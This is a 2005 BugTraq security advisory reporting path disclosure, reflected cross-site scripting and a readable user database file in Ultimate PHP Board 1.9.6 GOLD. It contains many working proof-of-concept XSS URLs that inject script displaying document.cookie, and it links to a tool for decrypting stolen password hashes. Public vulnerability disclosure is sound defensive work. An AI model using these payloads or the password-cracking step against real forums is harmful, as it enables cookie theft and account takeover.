BugTraq
M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB 1.9.6 GOLD Jun 16 2005 12:34PM
Alberto Trivero (trivero jumpy it)
M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB 1.9.6 GOLD

Published: 06 16 2005

Released: 06 16 2005

Name: Ultimate PHP Board (UPB)

Affected Systems: <= 1.9.6 GOLD

Issue: Full Path Disclosure, Cross-Site Scripting, Sensitive Information
Disclosure

Author: Alberto Trivero

Vendor: http://www.myupb.com/ourscripts_upb.php

Software Description

***********

"UPB is a forum/message board script. It supports threaded discussion with a
comprehesive text database system that we wrote here at php outburst for the
backend."

Full Path Disclosure

*******

Thanks to an improper control of the value of some variables it's possible
to cause some errors and obtain the full path by sending simples requests
like these:

http://www.example.com/upb/viewtopic.php?id=0
http://www.example.com/upb/profile.php?action=get&id=0
http://www.example.com/upb/newpost.php?t_id=0

Cross-Site Scripting (XSS)

*******

Let's look at code from login.php at line 69:

<?
...
echo "<form action='login.php?ref=$ref&l=1' method=POST>

<center>$skin_tableheading
...
?>

The $rev parameter can be controlled by a remote user and when UPB get the
value don't sanitise properly it, so a malicious user can inject some HTML
code like this:

'><script>alert(document.cookie)</script>

that will change the HTML line in:

<form
action='login.php?ref='><script>alert(document.cookie)</script>&l=1'
method=POST>

executing the <script>...</script> tag that show, in this case, the cookies.
This is the PoC URL:

http://www.example.com/upb/login.php?ref=%27%3E%3Cscript%3Ealert(documen
t.co
okie)%3C/script%3E

Let's look now at code from viewtopic.php at line 13:

<?
...
$where = "<b>></b> <a href='viewforum.php?id=$id'>$w_forum[forum]</a>
<b>></b> $w_topic[subject]";
...
?>

We can notice in the $id parameter the same preceding problem explottable
with an URL like this:

http://www.example.com/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(docu
ment
.cookie)%3C/script%3E

These are other PoC URLs for other parameters:

http://www.example.com/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscrip
t%3E
alert(document.cookie)%3C/script%3E

http://www.example.com/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ea
lert
(document.cookie)%3C/script%3E

http://www.example.com/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ea
lert
(document.cookie)%3C/script%3E

http://www.example.com/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(docume
nt.c
ookie)%3C/script%3E

http://www.example.com/upb/email.php?id=%27%3E%3Cscript%3Ealert(document
.coo
kies)%3C/script%3E

http://www.example.com/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert
(doc
ument.cookie)%3C/script%3E

http://www.example.com/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert
(doc
ument.cookie)%3C/script%3E

http://www.example.com/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(docum
ent.
cookie)%3C/script%3E

http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Eale
rt(d
ocument.cookie)%3C/script%3E

Sensitive Information Disclosure

*********

In many cases (every time with non Apache webservers but some time also with
its) it's possible to obtain sensitives informations about all the users
registered on the UPB forum by surfing on this file:

http://www.example.com/upb/db/users.dat

and viewing informations structured in this way:

user_name<~>password<~>level<~>email<~>view_email<~>mail_list<~>location
<~>u
rl<~>avatar<~>icq<~>aim<~>msn<~>sig<~>posts<~>date_added<~>id

The passwords of users are crypted and for automate the decription I made a
code available at this address: http://albythebest.altervista.org/upb.pl

Solution

*********

The vendor has been contacted many times but a patch was not yet produced.

Alberto Trivero - trivero (at) jumpy (dot) it [email concealed]

Come cheer us at #security-it on Freenode ( irc.freenode.net )

(C) 2005 Copyright by Madroot Security Group

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus